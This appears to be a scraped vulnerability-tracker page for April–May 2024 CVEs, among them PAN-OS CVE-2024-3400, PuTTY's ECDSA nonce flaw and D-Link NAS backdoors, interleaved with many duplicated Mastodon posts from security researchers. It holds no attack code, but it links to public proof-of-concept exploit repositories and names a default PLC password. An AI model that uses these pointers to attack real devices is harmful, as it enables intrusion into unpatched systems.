It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

simontsui@infosec.exchange at 2024-04-20T12:58:43.000Z ##

Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗paloaltonetworks.com/blog/2024

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC

##

Walker at 2024-04-23T01:38:04.983Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

jerry at 2024-05-02T23:02:20.478Z ##

Time to set your Palo firewalls on fire: security.paloaltonetworks.com/

##

jos1264@social.skynetcloud.site at 2024-04-30T13:25:05.000Z ##

Palo Alto firewalls: CVE-2024-3400 exploitation and PoCs for persistence after resets/upgrades helpnetsecurity.com/2024/04/30 #PaloAltoNetworks #Don'tmiss #Hotstuff #firewall #exploit #News #PoC

##

catc0n at 2024-04-26T21:29:01.741Z ##

Good haul this week, including modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

bontchev at 2024-04-25T09:49:53.934Z ##

Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:

exploitalert.com/view-details/

##

apicultor@hachyderm.io at 2024-04-24T21:06:29.000Z ##

@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?

Because of shitty engineering and nobody giving a fuck about doing things right.

It just isn't more exciting than that. Sorry.

A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
labs.watchtowr.com/palo-alto-p

##

jbhall56 at 2024-04-23T12:02:41.999Z ##

Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. securityweek.com/siemens-indus

##

jbhall56 at 2024-04-22T12:36:32.414Z ##

The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. securityweek.com/thousands-of-

##

jerry@infosec.exchange at 2024-05-02T23:02:20.000Z ##

Time to set your Palo firewalls on fire: security.paloaltonetworks.com/

##

catc0n@infosec.exchange at 2024-04-26T21:29:01.000Z ##

Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

bontchev@infosec.exchange at 2024-04-25T09:49:53.000Z ##

Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:

exploitalert.com/view-details/

##

apicultor@hachyderm.io at 2024-04-24T21:06:29.000Z ##

@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?

Because of shitty engineering and nobody giving a fuck about doing things right.

It just isn't more exciting than that. Sorry.

A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
labs.watchtowr.com/palo-alto-p

##

jbhall56@infosec.exchange at 2024-04-23T12:02:41.000Z ##

Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. securityweek.com/siemens-indus

##

jbhall56@infosec.exchange at 2024-04-22T12:36:32.000Z ##

The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. securityweek.com/thousands-of-

##

CVE-2024-29003
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-23T15:30:35

1 posts

The SolarWinds Platform was susceptible to a XSS vulnerability that affects the maps section of the user interface. This vulnerability requires authentication and requires user interaction.

screaminggoat at 2024-04-23T11:30:23.931Z ##

Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:

  • CVE-2024-28073 (8.4 high) SolarWinds Serv-U Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-29001 (7.5 high) SolarWinds Platform SWQL Injection Vulnerability
  • CVE-2024-29003 (7.5 high) SolarWinds Platform Cross Site Scripting Vulnerability

##

CVE-2024-1480
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-22T13:28:43.747000

4 posts

Unitronics Vision Standard line of controllers allow the Information Mode password to be retrieved without authentication.

screaminggoat at 2024-04-30T15:38:17.955Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

##

screaminggoat@infosec.exchange at 2024-04-30T15:38:17.000Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

#Unitronics #PLC #ICS #CVE_2024_1480

##

screaminggoat at 2024-04-30T15:38:17.955Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

##

screaminggoat@infosec.exchange at 2024-04-30T15:38:17.000Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

#Unitronics #PLC #ICS #CVE_2024_1480

##

CVE-2024-28076
(7.0 HIGH)

EPSS: 0.07%

updated 2024-04-19T14:15:11.080000

2 posts

The SolarWinds Platform was susceptible to a Arbitrary Open Redirection Vulnerability. A potential attacker can redirect to different domain when using URL parameter with relative entry in the correct format

screaminggoat at 2024-04-30T11:26:43.761Z ##

SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.

Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!

##

screaminggoat@infosec.exchange at 2024-04-30T11:26:43.000Z ##

SolarWinds security advisory: SolarWinds Platform Arbitrary Open Redirection Vulnerability (CVE-2024-28076)
CVE-2024-28076 (7.0 high, disclosed 18 April 2024) arbitrary open redirection vulnerability. If exploited, a potential attacker can redirect to a different domain when using URL parameter with relative entry in the correct format.

Interestingly, SolarWinds wrote the vector as CVSS:7.0/AV:A/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
I didn't know we were up to CVSSv7!!

#CVE_2024_28076 #SolarWinds #PatchTuesday #vulnerability

##

CVE-2024-29001
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-18T09:30:53

1 posts

A SolarWinds Platform SWQL Injection Vulnerability was identified in the user interface. This vulnerability requires authentication and user interaction to be exploited.

screaminggoat at 2024-04-23T11:30:23.931Z ##

Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:

  • CVE-2024-28073 (8.4 high) SolarWinds Serv-U Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-29001 (7.5 high) SolarWinds Platform SWQL Injection Vulnerability
  • CVE-2024-29003 (7.5 high) SolarWinds Platform Cross Site Scripting Vulnerability

##

CVE-2024-28073
(8.5 HIGH)

EPSS: 0.04%

updated 2024-04-17T18:31:37

1 posts

SolarWinds Serv-U was found to be susceptible to a Directory Traversal Remote Code Vulnerability. This vulnerability requires a highly privileged account to be exploited.

screaminggoat at 2024-04-23T11:30:23.931Z ##

Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:

  • CVE-2024-28073 (8.4 high) SolarWinds Serv-U Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-29001 (7.5 high) SolarWinds Platform SWQL Injection Vulnerability
  • CVE-2024-29003 (7.5 high) SolarWinds Platform Cross Site Scripting Vulnerability

##

CVE-2024-22354
(7.0 None)

EPSS: 0.04%

updated 2024-04-17T03:30:48

2 posts

IBM WebSphere Application Server 8.5, 9.0 and IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.3 are vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information, consume memory resources, or to conduct a server-side request forgery attack. IBM X-Force ID: 280401.

CVE-2024-21111
(7.8 HIGH)

EPSS: 0.04%

updated 2024-04-17T00:31:31

4 posts

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM

1 repos

https://github.com/mansk1es/CVE-2024-21111

CVE-2024-31497(CVSS UNKNOWN)

EPSS: 0.05%

updated 2024-04-17T00:31:29

4 posts

In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. One scenario is that the adversary is an operator of an SSH server to which the victim authenticates (f

2 repos

https://github.com/edutko/cve-2024-31497

https://github.com/sh1k4ku/CVE-2024-31497

kaito834 at 2024-04-25T22:58:43.689Z ##

JVNVU#91264077: PuTTY SSHクライアントのECDSA署名処理に脆弱性 jvn.jp/vu/JVNVU91264077/ 2024/04/18公開

「NIST P521楕円曲線によるECDSA秘密鍵を使っている場合、署名を行う際に生成するnonceに偏り...(CVE-2024-31497...)...60個程度の署名データから、使用している秘密鍵を特定される可能性」

##

ajn142 at 2024-04-22T20:50:49.147Z ##

Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.

chaos.social/@gsuberland/11227

##

ajn142@infosec.exchange at 2024-04-22T20:50:49.000Z ##

Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.

chaos.social/@gsuberland/11227

##

ajn142@infosec.exchange at 2024-04-22T01:22:11.000Z ##

My thoughts on this are being driven by recent experiences RE CVE-2024-31497 on workstations and servers, but I want to listen to the folks who do this for a living before I start talking too much.

##

CVE-2024-1135
(8.2 HIGH)

EPSS: 0.04%

updated 2024-04-16T23:24:40

2 posts

Gunicorn fails to properly validate Transfer-Encoding headers, leading to HTTP Request Smuggling (HRS) vulnerabilities. By crafting requests with conflicting Transfer-Encoding headers, attackers can bypass security restrictions and access restricted endpoints. This issue is due to Gunicorn's handling of Transfer-Encoding headers, where it incorrectly processes requests with multiple, conflicting T

mmguero at 2024-05-01T14:28:30.340Z ##

The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.

See this playlist of overview videos for an introduction to Malcolm and its main components.

  • Features and enhancements
    • Zeek-extracted files scanned and preserved on a Hedgehog Linux sensor can now be accessed via the extracted files download user interface (#331).
    • Improvements to creation of index templates, dashboards, and other saved objects on startup (#208) to ensure that saved objects get created correctly upon upgrade (see this comment for more details on this feature).
    • Populating the NetBox inventory via passively-gathered network traffic metadata now uses network traffic logs for DNS, NTLM, and DHCP to identify assets' host names when possible for use when populating device and VM names (#415). Autopopulated devices now have their status field set to Active rather than Staged, and uses tags instead to indicated that they were created through autopopulation.
    • Users can now specify pruning thresholds for carved files so that old files are deleted in order to avoid filling available storage (#453). See a new section of documentation on Managing disk usage for more information about this and similar settings.
    • Users can now specify a prefix that will be prepended to dashboards as they are imported into OpenSearch Dashboards or Kibana, allowing users who have dashboards from other sources to differentiate between those and Malcolm's (#455).
    • The default anomaly detectors created for the OpenSearch Anomaly Detection plugin are now created with category fields for high cardinality to allow for better breakdown of contributing values to anomalies discovered (#464).
    • Include JA4+ plugin in Arkime. See #419 for status on upcoming full JA4+ support in Malcolm.
    • Hedgehog Linux sensors can now periodically refresh their Zeek inteligence files.
    • Assorted documentation improvements.
  • Component version updates
  • Bug fixes
    • The documentation for Windows host system configuration was out of date and has been updated for the latest version of Microsoft Windows Subsystem for Linux (#421).
    • An issue was fixed in which Malcolm's list of users and their password hashes could become corrupted if the file did not initially end with a newline character (#426).
    • The manner in which Zeek intel files are generated has been changed to avoid problems found in Kubernetes deployments when scaling out the number of zeek-live containers (#456). See this comment for more details.
    • Removed the version top-level element from docker-compose.yml files as it is now obsolete and caused a warning message that sometimes was not handled correctly.
    • Fix Malcolm ISO not correctly detecting if it's in a live boot ISO environment or installed mode.
    • Restart live Zeek instances with zeekctl deploy instead of zeekctl restart.

Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh) and PowerShell (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

##

mmguero@infosec.exchange at 2024-05-01T14:28:30.000Z ##

The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.

See this playlist of overview videos for an introduction to Malcolm and its main components.

  • Features and enhancements
    • Zeek-extracted files scanned and preserved on a Hedgehog Linux sensor can now be accessed via the extracted files download user interface (#331).
    • Improvements to creation of index templates, dashboards, and other saved objects on startup (#208) to ensure that saved objects get created correctly upon upgrade (see this comment for more details on this feature).
    • Populating the NetBox inventory via passively-gathered network traffic metadata now uses network traffic logs for DNS, NTLM, and DHCP to identify assets' host names when possible for use when populating device and VM names (#415). Autopopulated devices now have their status field set to Active rather than Staged, and uses tags instead to indicated that they were created through autopopulation.
    • Users can now specify pruning thresholds for carved files so that old files are deleted in order to avoid filling available storage (#453). See a new section of documentation on Managing disk usage for more information about this and similar settings.
    • Users can now specify a prefix that will be prepended to dashboards as they are imported into OpenSearch Dashboards or Kibana, allowing users who have dashboards from other sources to differentiate between those and Malcolm's (#455).
    • The default anomaly detectors created for the OpenSearch Anomaly Detection plugin are now created with category fields for high cardinality to allow for better breakdown of contributing values to anomalies discovered (#464).
    • Include JA4+ plugin in Arkime. See #419 for status on upcoming full JA4+ support in Malcolm.
    • Hedgehog Linux sensors can now periodically refresh their Zeek inteligence files.
    • Assorted documentation improvements.
  • Component version updates
  • Bug fixes
    • The documentation for Windows host system configuration was out of date and has been updated for the latest version of Microsoft Windows Subsystem for Linux (#421).
    • An issue was fixed in which Malcolm's list of users and their password hashes could become corrupted if the file did not initially end with a newline character (#426).
    • The manner in which Zeek intel files are generated has been changed to avoid problems found in Kubernetes deployments when scaling out the number of zeek-live containers (#456). See this comment for more details.
    • Removed the version top-level element from docker-compose.yml files as it is now obsolete and caused a warning message that sometimes was not handled correctly.
    • Fix Malcolm ISO not correctly detecting if it's in a live boot ISO environment or installed mode.
    • Restart live Zeek instances with zeekctl deploy instead of zeekctl restart.

Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh) and PowerShell (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi

##

CVE-2024-3272
(9.8 CRITICAL)

EPSS: 1.27%

updated 2024-04-15T20:14:55.570000

4 posts

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack

1 repos

https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE

screaminggoat at 2024-04-29T14:56:25.225Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

##

screaminggoat@infosec.exchange at 2024-04-29T14:56:25.000Z ##

SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.

I have not been able to find an associated CVE number.

FYI @jullrich, the associated CVE IDs are

  • CVE-2024-3272 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 (9.8 critical, disclosed 03 April 2024, added to CISA KEV Catalog 11 April) D-Link Multiple NAS Devices Command Injection Vulnerability

#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation

##

screaminggoat at 2024-05-01T13:40:41.063Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

##

screaminggoat@infosec.exchange at 2024-05-01T13:40:41.000Z ##

@cR0w @reverseics There's an timeless argument of whether or not hardcoded default credentials is a vulnerability worth of a CVE.

A search in CISA's KEV Catalog shows CVE-2024-3272, CVE-2022-26138, CVE-2020-29583, CVE-2020-8657 of various products have the title ending in "Use of Hard-Coded Credentials Vulnerability." CVE-2023-6448 is the only one for "default password vulnerability."

#CveCrowdDeny

##

CVE-2024-2279
(8.7 HIGH)

EPSS: 0.04%

updated 2024-04-12T03:30:44

2 posts

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.7 to 16.8.6 all versions starting from 16.9 before 16.9.4, all versions starting from 16.10 before 16.10.2. Using the autocomplete for issues references feature a crafted payload may lead to a stored XSS, allowing attackers to perform arbitrary actions on behalf of victims.

screaminggoat at 2024-04-26T11:57:27.519Z ##

SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."

##

screaminggoat@infosec.exchange at 2024-04-26T11:57:27.000Z ##

SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."

#GitLab #CVE_2024_2279 #XSS

##

CVE-2024-3651
(6.2 MEDIUM)

EPSS: 0.00%

updated 2024-04-11T21:32:40

2 posts

### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. ### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7. ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the dom

mmguero at 2024-05-01T14:28:30.340Z ##

The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.

See this playlist of overview videos for an introduction to Malcolm and its main components.

  • Features and enhancements
    • Zeek-extracted files scanned and preserved on a Hedgehog Linux sensor can now be accessed via the extracted files download user interface (#331).
    • Improvements to creation of index templates, dashboards, and other saved objects on startup (#208) to ensure that saved objects get created correctly upon upgrade (see this comment for more details on this feature).
    • Populating the NetBox inventory via passively-gathered network traffic metadata now uses network traffic logs for DNS, NTLM, and DHCP to identify assets' host names when possible for use when populating device and VM names (#415). Autopopulated devices now have their status field set to Active rather than Staged, and uses tags instead to indicated that they were created through autopopulation.
    • Users can now specify pruning thresholds for carved files so that old files are deleted in order to avoid filling available storage (#453). See a new section of documentation on Managing disk usage for more information about this and similar settings.
    • Users can now specify a prefix that will be prepended to dashboards as they are imported into OpenSearch Dashboards or Kibana, allowing users who have dashboards from other sources to differentiate between those and Malcolm's (#455).
    • The default anomaly detectors created for the OpenSearch Anomaly Detection plugin are now created with category fields for high cardinality to allow for better breakdown of contributing values to anomalies discovered (#464).
    • Include JA4+ plugin in Arkime. See #419 for status on upcoming full JA4+ support in Malcolm.
    • Hedgehog Linux sensors can now periodically refresh their Zeek inteligence files.
    • Assorted documentation improvements.
  • Component version updates
  • Bug fixes
    • The documentation for Windows host system configuration was out of date and has been updated for the latest version of Microsoft Windows Subsystem for Linux (#421).
    • An issue was fixed in which Malcolm's list of users and their password hashes could become corrupted if the file did not initially end with a newline character (#426).
    • The manner in which Zeek intel files are generated has been changed to avoid problems found in Kubernetes deployments when scaling out the number of zeek-live containers (#456). See this comment for more details.
    • Removed the version top-level element from docker-compose.yml files as it is now obsolete and caused a warning message that sometimes was not handled correctly.
    • Fix Malcolm ISO not correctly detecting if it's in a live boot ISO environment or installed mode.
    • Restart live Zeek instances with zeekctl deploy instead of zeekctl restart.

Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh) and PowerShell (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

##

mmguero@infosec.exchange at 2024-05-01T14:28:30.000Z ##

The v24.04.0 release of Malcolm contains new features, improvements, bug fixes and component version updates.

See this playlist of overview videos for an introduction to Malcolm and its main components.

  • Features and enhancements
    • Zeek-extracted files scanned and preserved on a Hedgehog Linux sensor can now be accessed via the extracted files download user interface (#331).
    • Improvements to creation of index templates, dashboards, and other saved objects on startup (#208) to ensure that saved objects get created correctly upon upgrade (see this comment for more details on this feature).
    • Populating the NetBox inventory via passively-gathered network traffic metadata now uses network traffic logs for DNS, NTLM, and DHCP to identify assets' host names when possible for use when populating device and VM names (#415). Autopopulated devices now have their status field set to Active rather than Staged, and uses tags instead to indicated that they were created through autopopulation.
    • Users can now specify pruning thresholds for carved files so that old files are deleted in order to avoid filling available storage (#453). See a new section of documentation on Managing disk usage for more information about this and similar settings.
    • Users can now specify a prefix that will be prepended to dashboards as they are imported into OpenSearch Dashboards or Kibana, allowing users who have dashboards from other sources to differentiate between those and Malcolm's (#455).
    • The default anomaly detectors created for the OpenSearch Anomaly Detection plugin are now created with category fields for high cardinality to allow for better breakdown of contributing values to anomalies discovered (#464).
    • Include JA4+ plugin in Arkime. See #419 for status on upcoming full JA4+ support in Malcolm.
    • Hedgehog Linux sensors can now periodically refresh their Zeek inteligence files.
    • Assorted documentation improvements.
  • Component version updates
  • Bug fixes
    • The documentation for Windows host system configuration was out of date and has been updated for the latest version of Microsoft Windows Subsystem for Linux (#421).
    • An issue was fixed in which Malcolm's list of users and their password hashes could become corrupted if the file did not initially end with a newline character (#426).
    • The manner in which Zeek intel files are generated has been changed to avoid problems found in Kubernetes deployments when scaling out the number of zeek-live containers (#456). See this comment for more details.
    • Removed the version top-level element from docker-compose.yml files as it is now obsolete and caused a warning message that sometimes was not handled correctly.
    • Fix Malcolm ISO not correctly detecting if it's in a live boot ISO environment or installed mode.
    • Restart live Zeek instances with zeekctl deploy instead of zeekctl restart.

Official ISO installer images for Malcolm and Hedgehog Linux can now be downloaded from Malcolm's releases page on GitHub. Due to limits on individual files in GitHub releases, these ISO files have been split into 2GB chunks and can be reassembled with scripts provided for both Bash (release_cleaver.sh) and PowerShell (release_cleaver.ps1). See Downloading Malcolm - Installer ISOs for instructions.

#Malcolm #HedgehogLinux #Zeek #Arkime #NetBox #OpenSearch #Elasticsearch #Suricata #PCAP #NetworkTrafficAnalysis #networksecuritymonitoring #OT #ICS #icssecurity #CyberSecurity #Cyber #Infosec #GitHub #INL #DHS #CISA #CISAgov #Kubernetes #Docker #raspberrypi

##

CVE-2024-26198
(8.8 HIGH)

EPSS: 0.53%

updated 2024-04-11T21:30:50

2 posts

Microsoft Exchange Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-23T18:07:50.495Z ##

Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 msrc.microsoft.com/update-guid

Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.

I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.

##

screaminggoat@infosec.exchange at 2024-04-23T18:07:50.000Z ##

Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 msrc.microsoft.com/update-guid

Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.

I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.

#CVE_2024_26198 #Microsoft #MSRC #vulnerability #PatchTuesday

##

CVE-2023-41266
(8.2 HIGH)

EPSS: 85.11%

updated 2024-04-11T21:06:16

2 posts

A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023

Nuclei template

1 repos

https://github.com/praetorian-inc/zeroqlik-detect

screaminggoat at 2024-04-26T14:59:18.789Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

##

screaminggoat@infosec.exchange at 2024-04-26T14:59:18.000Z ##

Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot

This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:

  • CVE-2023-41266 (vendor 8.2 high/NVD 6.5 medium) path traversal, disclosed ~29 August 2023?, added to CISA KEV Catalog 07 December 2023
  • CVE-2023-41265 (vendor 9.6 critical/NVD 9.9 critical) also known as ZeroQlik ... HTTP Request Tunneling vulnerability, disclosed ~29 August 2023?, added to KEV 07 December 2023
  • CVE-2023-48365 (vendor 9.6 critical/NVD 9.9 critical) also known as DoubleQlik ... EoP and a patch bypass of CVE-2023-41265, disclosed 15 November 2023

Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.

#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel

##

CVE-2024-2604
(6.3 MEDIUM)

EPSS: 0.04%

updated 2024-04-11T01:25:29.777000

4 posts

A vulnerability was found in SourceCodester File Manager App 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update-file.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257182 is the identifier assigned to this vulnera

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
